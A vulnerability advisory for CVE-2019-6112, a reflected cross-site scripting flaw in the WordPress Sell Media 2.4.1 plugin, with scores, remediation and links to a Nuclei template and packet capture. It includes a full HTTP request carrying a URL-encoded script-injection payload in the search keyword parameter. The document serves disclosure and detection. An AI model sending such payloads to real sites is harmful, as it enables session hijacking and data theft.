| Title | WordPress Sell Media 2.4.1 - Cross-Site Scripting |
|---|---|
| Author | dwisiswant0 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.32802 |
| CVE ID | CVE-2019-6112 |
| CWE ID | CWE-79 |
| Tags | cve cve2019 wordpress wp-plugin xss graphpaperpress vuln |
WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-6112.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-6112.pcap
N/AN/A